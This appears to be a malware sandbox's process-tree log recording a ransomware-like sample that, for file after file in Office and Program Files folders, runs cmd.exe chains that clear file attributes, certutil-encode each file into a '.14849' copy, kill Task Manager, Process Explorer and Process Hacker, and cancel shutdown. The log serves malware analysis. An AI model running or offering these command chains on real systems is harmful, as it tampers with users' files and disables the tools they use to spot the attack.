C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "DW20.EXE" "DW20.EXE".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:1700
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵PID:1656
-
-
C:\Windows\system32\certutil.execertutil -encode -f "DW20.EXE" "DW20.EXE".148495⤵PID:1944
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵PID:332
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵PID:1152
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "dwdcw20.dll" "dwdcw20.dll".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:436
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵PID:1816
-
-
C:\Windows\system32\certutil.execertutil -encode -f "dwdcw20.dll" "dwdcw20.dll".148495⤵PID:1640
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵PID:1732
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵PID:1624
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "dwtrig20.exe" "dwtrig20.exe".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:1520
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵PID:1336
-
-
C:\Windows\system32\certutil.execertutil -encode -f "dwtrig20.exe" "dwtrig20.exe".148495⤵PID:1596
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵PID:680
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵PID:1568
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "Microsoft.VC90.CRT.manifest" "Microsoft.VC90.CRT.manifest".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:1296
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵PID:1888
-
-
C:\Windows\system32\certutil.execertutil -encode -f "Microsoft.VC90.CRT.manifest" "Microsoft.VC90.CRT.manifest".148495⤵PID:1940
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵PID:1512
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵PID:1456
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "msvcr90.dll" "msvcr90.dll".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:1316
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵PID:1736
-
-
C:\Windows\system32\certutil.execertutil -encode -f "msvcr90.dll" "msvcr90.dll".148495⤵PID:944
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵PID:672
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵PID:1884
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "OfficeLR.cab" "OfficeLR.cab".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:692
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵PID:1468
-
-
C:\Windows\system32\certutil.execertutil -encode -f "OfficeLR.cab" "OfficeLR.cab".148495⤵PID:1628
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵PID:1920
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵PID:1776
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "OfficeMUI.msi" "OfficeMUI.msi".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:1652
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵PID:1900
-
-
C:\Windows\system32\certutil.execertutil -encode -f "OfficeMUI.msi" "OfficeMUI.msi".148495⤵PID:1436
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵PID:1716
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵PID:1488
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "OfficeMUI.xml" "OfficeMUI.xml".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:1944
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵PID:1892
-
-
C:\Windows\system32\certutil.execertutil -encode -f "OfficeMUI.xml" "OfficeMUI.xml".148495⤵PID:612
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵PID:332
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵PID:1816
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "OfficeMUISet.msi" "OfficeMUISet.msi".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:660
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
- Views/modifies file attributes
PID:1204
-
-
C:\Windows\system32\certutil.execertutil -encode -f "OfficeMUISet.msi" "OfficeMUISet.msi".148495⤵PID:1964
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵PID:316
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵PID:1540
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "OfficeMUISet.xml" "OfficeMUISet.xml".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:1428
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵PID:1596
-
-
C:\Windows\system32\certutil.execertutil -encode -f "OfficeMUISet.xml" "OfficeMUISet.xml".148495⤵PID:1960
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
- Kills process with taskkill
PID:1148
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵PID:1520
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "osetupui.dll" "osetupui.dll".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:1252
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵PID:1940
-
-
C:\Windows\system32\certutil.execertutil -encode -f "osetupui.dll" "osetupui.dll".148495⤵PID:1564
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵PID:1464
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵PID:1296
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "pss10r.chm" "pss10r.chm".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:1164
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵PID:944
-
-
C:\Windows\system32\certutil.execertutil -encode -f "pss10r.chm" "pss10r.chm".148495⤵PID:900
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵PID:1696
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵PID:1316
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "setup.chm" "setup.chm".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:648
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵PID:1248
-
-
C:\Windows\system32\certutil.execertutil -encode -f "setup.chm" "setup.chm".148495⤵PID:1748
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵PID:1548
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵PID:1352
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "Setup.xml" "Setup.xml".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:1900
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵PID:572
-
-
C:\Windows\system32\certutil.execertutil -encode -f "Setup.xml" "Setup.xml".148495⤵PID:1656
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
- Kills process with taskkill
PID:1660
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵PID:1832
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "ShellUI.MST" "ShellUI.MST".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:1892
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
- Views/modifies file attributes
PID:1880
-
-
C:\Windows\system32\certutil.execertutil -encode -f "ShellUI.MST" "ShellUI.MST".148495⤵PID:1592
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵PID:964
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵PID:1928
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "dwintl20.dll" "dwintl20.dll".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:1204
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵PID:1460
-
-
C:\Windows\system32\certutil.execertutil -encode -f "dwintl20.dll" "dwintl20.dll".148495⤵PID:1964
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵PID:1624
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵PID:1540
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "Office64MUI.msi" "Office64MUI.msi".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:1848
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵PID:1576
-
-
C:\Windows\system32\certutil.execertutil -encode -f "Office64MUI.msi" "Office64MUI.msi".148495⤵PID:1960
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵PID:1992
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵PID:1520
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "Office64MUI.xml" "Office64MUI.xml".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:1712
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵PID:1068
-
-
C:\Windows\system32\certutil.execertutil -encode -f "Office64MUI.xml" "Office64MUI.xml".148495⤵PID:1564
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵PID:1684
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵PID:1296
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "Office64MUISet.msi" "Office64MUISet.msi".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:1420
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵PID:1452
-
-
C:\Windows\system32\certutil.execertutil -encode -f "Office64MUISet.msi" "Office64MUISet.msi".148495⤵PID:900
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵PID:1792
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵PID:1316
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "Office64MUISet.xml" "Office64MUISet.xml".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:1628
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵PID:656
-
-
C:\Windows\system32\certutil.execertutil -encode -f "Office64MUISet.xml" "Office64MUISet.xml".148495⤵PID:1748
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵PID:520
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵PID:1352
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "OWOW64LR.cab" "OWOW64LR.cab".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:1436
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵PID:1688
-
-
C:\Windows\system32\certutil.execertutil -encode -f "OWOW64LR.cab" "OWOW64LR.cab".148495⤵PID:1656
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
- Kills process with taskkill
PID:592
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵PID:636
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "Setup.xml" "Setup.xml".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:1880
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵PID:1700
-
-
C:\Windows\system32\certutil.execertutil -encode -f "Setup.xml" "Setup.xml".148495⤵PID:1816
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵PID:1988
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵PID:1820
-
-
-
C:\Windows\system32\cmd.exe/c if TRUE==FALSE attrib -s -h -r *.* & certutil -encode -f "Access.en-us" "Access.en-us".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:1460
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "AccessMUISet.msi" "AccessMUISet.msi".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:1664
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵PID:316
-
-
C:\Windows\system32\certutil.execertutil -encode -f "AccessMUISet.msi" "AccessMUISet.msi".148495⤵PID:1336
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵PID:1388
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵PID:1680
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "AccessMUISet.xml" "AccessMUISet.xml".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:1480
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵PID:1888
-
-
C:\Windows\system32\certutil.execertutil -encode -f "AccessMUISet.xml" "AccessMUISet.xml".148495⤵PID:764
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵PID:680
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵PID:868
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "Setup.xml" "Setup.xml".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:556
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵PID:1736
-
-
C:\Windows\system32\certutil.execertutil -encode -f "Setup.xml" "Setup.xml".148495⤵PID:1464
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
- Kills process with taskkill
PID:1512
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵PID:1600
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "AccessMUI.msi" "AccessMUI.msi".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:328
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
- Views/modifies file attributes
PID:1468
-
-
C:\Windows\system32\certutil.execertutil -encode -f "AccessMUI.msi" "AccessMUI.msi".148495⤵PID:1696
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵PID:672
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵PID:1088
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "AccessMUI.xml" "AccessMUI.xml".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:1776
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵PID:692
-
-
C:\Windows\system32\certutil.execertutil -encode -f "AccessMUI.xml" "AccessMUI.xml".148495⤵PID:1548
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵PID:744
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵PID:1016
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "AccLR.cab" "AccLR.cab".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:816
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵PID:1832
-
-
C:\Windows\system32\certutil.execertutil -encode -f "AccLR.cab" "AccLR.cab".148495⤵PID:1932
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵PID:1660
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵PID:1436
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "branding.xml" "branding.xml".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:1756
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
- Views/modifies file attributes
PID:1816
-
-
C:\Windows\system32\certutil.execertutil -encode -f "branding.xml" "branding.xml".148495⤵PID:324
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵PID:964
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵PID:1880
-
-
-
C:\Windows\system32\cmd.exe/c if TRUE==FALSE attrib -s -h -r *.* & certutil -encode -f "Admin" "Admin".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:1812
-
-
C:\Windows\system32\cmd.exe/c if TRUE==FALSE attrib -s -h -r *.* & certutil -encode -f "7-Zip" "7-Zip".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:1732
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "AddSync.xlsm" "AddSync.xlsm".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:1336
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
- Drops desktop.ini file(s)
PID:1560
-
-
C:\Windows\system32\certutil.execertutil -encode -f "AddSync.xlsm" "AddSync.xlsm".148495⤵PID:660
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵PID:1388
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵PID:1888
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "CloseUninstall.mov" "CloseUninstall.mov".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:764
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
- Drops desktop.ini file(s)
- Drops file in Program Files directory
PID:1596
-
-
C:\Windows\system32\certutil.execertutil -encode -f "CloseUninstall.mov" "CloseUninstall.mov".148495⤵PID:1572
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵PID:680
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵PID:1736
-
-
-
C:\Windows\system32\cmd.exe/c if TRUE==FALSE attrib -s -h -r *.* & certutil -encode -f "Common Files" "Common Files".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:1464
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "desktop.ini" "desktop.ini".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:1296
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
- Drops desktop.ini file(s)
PID:1252
-
-
C:\Windows\system32\certutil.execertutil -encode -f "desktop.ini" "desktop.ini".148495⤵PID:1684
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵PID:1452
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵PID:852
-
-
-
C:\Windows\system32\cmd.exe/c if TRUE==FALSE attrib -s -h -r *.* & certutil -encode -f "DVD Maker" "DVD Maker".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:1420
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "ExitRestart.vdx" "ExitRestart.vdx".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:1164
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
- Drops desktop.ini file(s)
PID:1792
-
-
C:\Windows\system32\certutil.execertutil -encode -f "ExitRestart.vdx" "ExitRestart.vdx".148495⤵PID:656
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵PID:900
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵PID:1628
-
-
-
C:\Windows\system32\cmd.exe/c if TRUE==FALSE attrib -s -h -r *.* & certutil -encode -f "Google" "Google".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:648
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "GrantDebug.xla" "GrantDebug.xla".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:520
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
- Drops desktop.ini file(s)
PID:1488
-
-
C:\Windows\system32\certutil.execertutil -encode -f "GrantDebug.xla" "GrantDebug.xla".148495⤵PID:1016
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵PID:1652
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵PID:1900
-
-
-
C:\Windows\system32\cmd.exe/c if TRUE==FALSE attrib -s -h -r *.* & certutil -encode -f "Internet Explorer" "Internet Explorer".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:1764
-
-
C:\Windows\system32\cmd.exe/c if TRUE==FALSE attrib -s -h -r *.* & certutil -encode -f "Java" "Java".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:1592
-
-
C:\Windows\system32\cmd.exe/c if TRUE==FALSE attrib -s -h -r *.* & certutil -encode -f "Microsoft Games" "Microsoft Games".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:1436
-
-
C:\Windows\system32\cmd.exe/c if TRUE==FALSE attrib -s -h -r *.* & certutil -encode -f "Microsoft Office" "Microsoft Office".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:816
-
-
C:\Windows\system32\cmd.exe/c if TRUE==FALSE attrib -s -h -r *.* & certutil -encode -f "Mozilla Firefox" "Mozilla Firefox".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:1816
-
-
C:\Windows\system32\cmd.exe/c if TRUE==FALSE attrib -s -h -r *.* & certutil -encode -f "MSBuild" "MSBuild".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:1944
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "ReceiveUninstall.pptx" "ReceiveUninstall.pptx".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:1892
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
- Drops desktop.ini file(s)
PID:1820
-
-
C:\Windows\system32\certutil.execertutil -encode -f "ReceiveUninstall.pptx" "ReceiveUninstall.pptx".148495⤵PID:1840
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵PID:436
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵PID:1752
-
-
-
C:\Windows\system32\cmd.exe/c if TRUE==FALSE attrib -s -h -r *.* & certutil -encode -f "Reference Assemblies" "Reference Assemblies".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:1560
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "SaveReset.vsdm" "SaveReset.vsdm".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:1640
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
- Drops desktop.ini file(s)
PID:760
-
-
C:\Windows\system32\certutil.execertutil -encode -f "SaveReset.vsdm" "SaveReset.vsdm".148495⤵PID:1664
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵PID:1568
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵PID:1848
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "SelectCompress.vstx" "SelectCompress.vstx".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:1428
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
- Drops desktop.ini file(s)
PID:912
-
-
C:\Windows\system32\certutil.execertutil -encode -f "SelectCompress.vstx" "SelectCompress.vstx".148495⤵PID:1480
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵PID:1068
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵PID:1712
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "StartShow.vsw" "StartShow.vsw".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:1252
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
